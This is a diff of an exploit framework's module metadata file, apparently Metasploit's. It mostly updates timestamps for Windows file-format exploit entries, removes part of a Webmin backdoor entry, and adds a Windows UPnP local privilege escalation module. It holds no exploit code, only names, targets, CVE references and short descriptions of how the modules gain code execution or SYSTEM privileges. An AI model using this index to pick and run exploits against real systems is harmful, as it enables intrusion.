-    "ref_name": "unix/webapp/webmin_backdoor",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "SideEffects": [
-        "ioc-in-logs",
-        "artifacts-on-disk"
-      ]
-    },
-    "needs_cleanup": null
-  },
  "exploit_unix/webapp/webmin_show_cgi_exec": {
    "name": "Webmin /file/show.cgi Remote Command Execution",
    "fullname": "exploit/unix/webapp/webmin_show_cgi_exec",
@@ -105291,7 +105917,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/a_pdf_wav_to_mp3",
@@ -105374,7 +106000,7 @@
    "targets": [
      "ACDSee FotoSlate 4.0 Build 146"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/acdsee_fotoslate_string",
@@ -105415,7 +106041,7 @@
    "targets": [
      "ACDSee 9.0 (Build 1008)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/acdsee_xpm",
@@ -105498,7 +106124,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/activepdf_webgrabber",
@@ -105539,7 +106165,7 @@
    "targets": [
      "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_collectemailinfo",
@@ -105583,7 +106209,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_cooltype_sing",
@@ -105629,7 +106255,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flashplayer_button",
@@ -105673,7 +106299,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flashplayer_newfunction",
@@ -105717,7 +106343,7 @@
    "targets": [
      "Adobe Reader Windows Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flatedecode_predictor02",
@@ -105760,7 +106386,7 @@
    "targets": [
      "Adobe Reader Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_geticon.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_geticon",
@@ -105803,7 +106429,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_illustrator_v14_eps",
@@ -105848,7 +106474,7 @@
      "Adobe Reader v9.0.0 (Windows XP SP3 English)",
      "Adobe Reader v8.1.2 (Windows XP SP2 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_jbig2decode",
@@ -105894,7 +106520,7 @@
    "targets": [
      "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_libtiff",
@@ -105939,7 +106565,7 @@
      "Adobe Reader Windows English (JS Heap Spray)",
      "Adobe Reader Windows German (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_media_newplayer",
@@ -106076,7 +106702,7 @@
    "targets": [
      "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_reader_u3d",
@@ -106164,7 +106790,7 @@
    "targets": [
      "Adobe Reader Windows Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_u3d_meshdecl",
@@ -106205,7 +106831,7 @@
    "targets": [
      "Adobe Reader v8.1.2 (Windows XP SP3 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_utilprintf",
@@ -106296,7 +106922,7 @@
    "targets": [
      "Universal Salamander 2.5"
    ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/altap_salamander_pdb",
@@ -106383,7 +107009,7 @@
    "targets": [
      "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/aol_phobos_bof",
@@ -106426,7 +107052,7 @@
    "targets": [
      "Windows XP SP3 with DEP bypass"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/apple_quicktime_pnsize",
@@ -106604,7 +107230,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/audio_wkstn_pls",
@@ -106794,7 +107420,7 @@
      "metacom",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a stack-based buffer overflow on Beetel Connection Manager. The\n        vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini\n        file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP\n        SP3 and Windows 7 SP1.",
+    "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n        Manager. The vulnerability exists in the parsing of the UserName\n        parameter in the NetConfig.ini file.\n\n        The module has been tested successfully against version\n        PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.",
    "references": [
      "OSVDB-98714",
      "EDB-28969"
@@ -106811,7 +107437,7 @@
    "targets": [
      "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-02-04 10:05:41 +0000",
    "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
@@ -107073,7 +107699,7 @@
    "targets": [
      "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ca_cab.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ca_cab",
@@ -107158,7 +107784,7 @@
    "targets": [
      "CCMPlayer 1.5"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ccmplayer_m3u_bof",
@@ -107471,7 +108097,7 @@
      "CyberLink LabelPrint <= 2.5 on Windows 8.1 x64",
      "CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803"
    ],
-    "mod_time": "2018-12-11 07:55:20 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/cyberlink_lpp_bof",
@@ -107557,7 +108183,7 @@
    "targets": [
      "Cytel Studio 9.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/cytel_studio_cy3",
@@ -107770,7 +108396,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/djvu_imageurl",
@@ -107809,7 +108435,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-02-01 10:05:50 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/dupscout_xml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/dupscout_xml",
@@ -107940,7 +108566,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/emc_appextender_keyworks",
@@ -108199,7 +108825,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/fatplayer_wav",
@@ -108245,7 +108871,7 @@
    "targets": [
      "Free Download Manager 3.0 (Build 844)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/fdm_torrent",
@@ -108291,7 +108917,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/feeddemon_opml",
@@ -108334,7 +108960,7 @@
      "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)",
      "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/foxit_reader_filewrite",
@@ -108377,7 +109003,7 @@
    "targets": [
      "Foxit Reader 3.0 Windows XP SP2"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/foxit_reader_launch",
@@ -108513,7 +109139,7 @@
    "targets": [
      "Windows XP SP3 EN"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/free_mp3_ripper_wav",
@@ -108554,7 +109180,7 @@
    "targets": [
      "Windows XP Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/galan_fileformat_bof",
@@ -108680,7 +109306,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof",
@@ -108723,7 +109349,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_contentfile_bof",
@@ -108768,7 +109394,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_indexfile_bof",
@@ -109030,7 +109656,7 @@
      "IDEAL Migration <= 4.5.1 on Windows XP",
      "IDEAL Administration <= 10.5 on Windows XP"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ideal_migration_ipj",
@@ -109372,7 +109998,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot",
@@ -109414,7 +110040,7 @@
    "targets": [
      "Internet Explorer"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mcafee_showreport_exec",
@@ -109499,7 +110125,7 @@
      "Windows XP SP3 - English",
      "Windows XP SP2 - English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mediajukebox.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mediajukebox",
@@ -109540,7 +110166,7 @@
    "targets": [
      "Windows XP SP3 / Vista / 7"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/microp_mppl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/microp_mppl",
@@ -109625,7 +110251,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/millenium_mp3_pls",
@@ -109669,7 +110295,7 @@
    "targets": [
      "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30"
    ],
-    "mod_time": "2018-07-09 13:22:08 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mini_stream_pls_bof",
@@ -109792,7 +110418,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/moxa_mediadbplayback",
@@ -109876,7 +110502,7 @@
    "targets": [
      "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mplayer_sami_bof",
@@ -109925,7 +110551,7 @@
      "Microsoft Office 2007 SP2 English on Windows XP SP3 English",
      "Crash Target for Debugging"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms09_067_excel_featheader",
@@ -109972,7 +110598,7 @@
      "Microsoft PowerPoint Viewer 2003 (kb969615)",
      "Crash Target for Debugging"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms10_004_textbytesatom",
@@ -110018,7 +110644,7 @@
      "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3",
      "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms10_038_excel_obj_bof",
@@ -110163,7 +110789,7 @@
      "Microsoft Office Excel 2007 on Windows XP",
      "Microsoft Office Excel 2007 SP2 on Windows XP"
    ],
-    "mod_time": "2017-09-22 18:49:09 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms11_021_xlb_bof",
@@ -110611,7 +111237,7 @@
    "targets": [
      "Windows XP SP2 English"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms_visual_basic_vbp",
@@ -110695,7 +111321,7 @@
    "targets": [
      "Windows XP SP2-SP3 IE 7.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/msworks_wkspictureinterface",
@@ -110738,7 +111364,7 @@
      "Windows Universal (SEH)",
      "Windows XP SP3 French"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mymp3player_m3u",
@@ -110778,7 +111404,7 @@
    "targets": [
      "Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/netop.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/netop",
@@ -111160,7 +111786,7 @@
    "targets": [
      "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/openoffice_ole.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/openoffice_ole",
@@ -111332,7 +111958,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/proshow_cellimage_bof",
@@ -111592,7 +112218,7 @@
      "WinSrv 2000 SP2 English",
      "WinSrv 2003 Enterprise Edition SP1 (v1023) English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/safenet_softremote_groupname",
@@ -111633,7 +112259,7 @@
    "targets": [
      "Windows XP SP3 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/sascam_get.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/sascam_get",
@@ -111718,7 +112344,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/shadow_stream_recorder_bof",
@@ -111799,7 +112425,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/somplplayer_m3u",
@@ -111881,7 +112507,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-01-23 16:34:49 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/syncbreeze_xml",
@@ -112141,7 +112767,7 @@
    "targets": [
      "Windows XP SP0"
    ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ursoft_w32dasm",
@@ -112185,7 +112811,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/varicad_dwb",
@@ -112358,7 +112984,7 @@
      "Visio 2002 English on Windows XP SP3 Spanish",
      "Visio 2002 English on Windows XP SP3 English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/visio_dxf_bof",
@@ -112657,7 +113283,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_cue",
@@ -112697,7 +113323,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_m3u",
@@ -113005,7 +113631,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/wm_downloader_m3u",
@@ -113048,7 +113674,7 @@
    "targets": [
      "Windows XP SP2 / SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/xenorate_xpl_bof",
@@ -113135,7 +113761,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/xradio_xrl_sehbof",
@@ -115427,7 +116053,7 @@
    "targets": [
      "Windows XP SP3 / Windows Vista"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/ftp/scriptftp_list.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/scriptftp_list",
@@ -118228,7 +118854,7 @@
      "Efmws 5.3 Universal",
      "Efmws 4.0 Universal"
    ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-01-05 21:39:34 +0000",
    "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/efs_fmws_userid_bof",
@@ -127214,6 +127840,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/comahawk": {
+    "name": "Microsoft UPnP Local Privilege Elevation Vulnerability",
+    "fullname": "exploit/windows/local/comahawk",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-12",
+    "type": "exploit",
+    "author": [
+      "NCC Group",
+      "hoangprod",
+      "bwatters-r7"
+    ],
+    "description": "This exploit uses two vulnerabilities to execute a command as an elevated user.\n      The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n      NT AUTHORITY\\LOCAL SERVICE\n      The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n      elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "CVE-2019-1322",
+      "CVE-2019-1405",
+      "EDB-47684",
+      "URL-https://github.com/apt69/COMahawk",
+      "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/",
+      "URL-https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-12-18 14:33:13 +0000",
+    "path": "/modules/exploits/windows/local/comahawk.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/comahawk",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/local/current_user_psexec": {
    "name": "PsExec via Current User Token",
    "fullname": "exploit/windows/local/current_user_psexec",
